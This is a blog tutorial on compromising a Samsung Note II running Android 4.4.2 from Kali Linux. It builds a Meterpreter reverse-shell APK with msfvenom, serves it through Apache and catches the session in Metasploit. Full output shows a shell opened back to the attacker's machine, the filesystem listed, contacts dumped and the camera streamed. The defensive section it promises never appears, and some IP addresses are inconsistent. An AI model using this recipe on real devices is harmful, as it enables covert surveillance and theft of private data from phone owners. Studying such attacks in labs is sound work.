Top 5 This Week

Related Posts

Exploiting Samsung Note II N7100 Running Android KitKat 4.4.2

Getting your Trinity Audio player ready...

Exploiting Samsung Note II N7100 Running Android KitKat 4.4.2

This article offers an in-depth technical exploration of exploiting a Samsung Note II N7100 device running Android KitKat 4.4.2 using advanced penetration testing techniques with Kali Linux.

Initial Setup and Configuration

Begin by setting up the network environment and initiating necessary services on Kali Linux to prepare for the exploitation process.

    Creating and Deploying the Malicious APK

    Utilize msfvenom to create a custom Android Meterpreter payload, and deploy it to the target device via an Apache server.

      Establishing a Meterpreter Session

      Configure and execute the multi-handler exploit in Metasploit to establish a Meterpreter session with the target Samsung Note II device.

        Exploring Meterpreter’s Capabilities

        Dive into the various functionalities of the Meterpreter shell, from file system access to real-time camera streaming, highlighting the extent of control gained.

          Securing Android Devices Against Such Exploits

          Conclude with recommendations and best practices for securing Android devices against such vulnerabilities, emphasizing the importance of regular updates and security patches.

          • Android IP Address: 192.168.22.167
          • host IP address: 192.168.22.20
          • KALI IP Address: 192.168.22.59
          • on Kali terminal1 to start apache2: #sudo service apache2 start
          • If you want to enable any service permanently: To start: #systemctl enable apache2 | To stop: #system disable apache2
          • on Kali terminal

          ┌──(mrhacker㉿kali)-[/var/www/html]

          └─$ sudo service apache2 status
          ● apache2.service – The Apache HTTP Server

          • Loaded: loaded (/lib/systemd/system/apache2.service; disabled; vendor preset: disabled)
            Active: active (running) since Thu 2021-08-19 07:31:40 EDT; 6s ago
          • on host broser check the status: http://192.168.22.59/index.html
          • on Kali terminal2: $ msfvenom –help
            MsfVenom – a Metasploit standalone payload generator.
          • on terminal1 Kali: ┌──(mrhacker㉿kali)-[~/Desktop]
            └─$ sudo msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.22.59 LPORT=4444 R > /home/mrhacker/Desktop/androidApp.apk
            [sudo] password for mrhacker:
            [-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
            [-] No arch selected, selecting arch: dalvik from the payload
            No encoder specified, outputting raw payload
            Payload size: 10191 bytes
          • on terminal1 Kali: cp -p androidApp.apk /var/www/html/
          • on Android phone: Browser: http://192.168.22.167/androidApp.apk
          • on Kali terminal2: $ msfconsole
          • msf6 > use exploit/multi/handler
            [*] Using configured payload generic/shell_reverse_tcp
            msf6 exploit(multi/handler) > set payload android/meterpreter/reverse_tcp
            payload => android/meterpreter/reverse_tcp
            msf6 exploit(multi/handler) >show options
          • msf6 exploit(multi/handler) > set LHOST 192.168.22.167
            LHOST => 192.168.22.167
          • msf6 exploit(multi/handler) > exploit[-] Handler failed to bind to 192.168.22.167:4444:- –
            [*] Started reverse TCP handler on 0.0.0.0:4444
            [*] Sending stage (77002 bytes) to 192.168.22.167
            [*] Meterpreter session 1 opened (192.168.22.59:4444 -> 192.168.22.167:39505) at 2021-08-19 07:59:07 -0400meterpreter > background
          • msf6 exploit(multi/handler) > sessions
          • msf6 exploit(multi/handler) > sessions i 1Active sessions
            ===============Id Name Type Information Connection
            — —- —- ———– ———-
            1 meterpreter dalvik/android u0_a209 @ localhost 192.168.22.59:4444 -> 192.168.22.167:39505 (192.168.22.167)msf6 exploit(multi/handler) > help
          • msf6 exploit(multi/handler) > sessions -i 1
            [*] Starting interaction with 1…meterpreter > pwd
            /data/data/com.metasploit.stage/files

          meterpreter > ls -al
          Listing: /
          ==========

          Mode Size Type Last modified Name
          —- —- —- ————- —-
          40554/r-xr-xr– 0 dir 2021-08-18 13:11:50 -0400 acct
          40000/——— 4096 dir 2021-08-19 07:43:24 -0400 cache
          40000/——— 0 dir 2021-08-18 13:11:50 -0400 config
          40554/r-xr-xr– 0 dir 1969-12-31 19:00:00 -0500 d
          ….
          100444/r–r–r– 2166 fil 1969-12-31 19:00:00 -0500 ueventd.smdk4x12.rc
          40554/r-xr-xr– 4096 dir 2016-06-08 10:29:50 -0400 vendor

           

          meterpreter > app_list
          Application List
          ================

          Name Package Running IsSystem
          —- ——- ——- ——–
          AASAservice com.samsung.aasaservice false true
          Active applications com.sec.android.widgetapp.activeapplicationwidget true true
          Adapt Sound com.sec.hearingadjust false true
          AllShare ControlShare Service com.sec.android.allshare.service.controlshare false true
          AllShare FileShare Service com.sec.android.allshare.service.fileshare false true
          Android System android false true
          ….
          com.sec.phone com.sec.phone false true
          ringtonebackup com.sec.android.app.ringtoneBR false true
          wssyncmlnps com.wssnps false true

          meterpreter > dump_contacts
          [*] Fetching 1 contact into list
          [*] Contacts list saved to: contacts_dump_20210819081459.txt
          meterpreter >camera_stream

          Cogeanu Marius
          Cogeanu Mariushttps://cogeanu.com
          Marius Cogeanu is a distinguished IT consultant and cybersecurity virtuoso based in Prague, Czechia. With a rich 20-year journey in the IT realm, Marius has carved a niche in network security and technological solutions, adeptly harmonizing tech with business requirements. His experience spans from Kyndryl to IBM, and as a valued independent consultant, where he's renowned for his innovative approaches in enhancing business operations with cutting-edge tech.Marius's forte lies in demystifying complex IT concepts, ensuring clarity and alignment for stakeholders at all levels. His commitment to staying at the forefront of industry trends and seeking innovative solutions cements his status as a go-to expert in cybersecurity. Driven by a fervent passion for technology and its potential to revolutionize businesses, Marius thrives on tackling challenging ventures, applying his prowess in network design, IT service management, and strategic planning.Currently, Marius is focused on leading-edge IT project management, infrastructure design, and fortifying cybersecurity, guiding clients through the intricate digital landscape with unmatched expertise and insight.Discover more on https://cogeanu.com

          LEAVE A REPLY

          Please enter your comment!
          Please enter your name here

          Popular Articles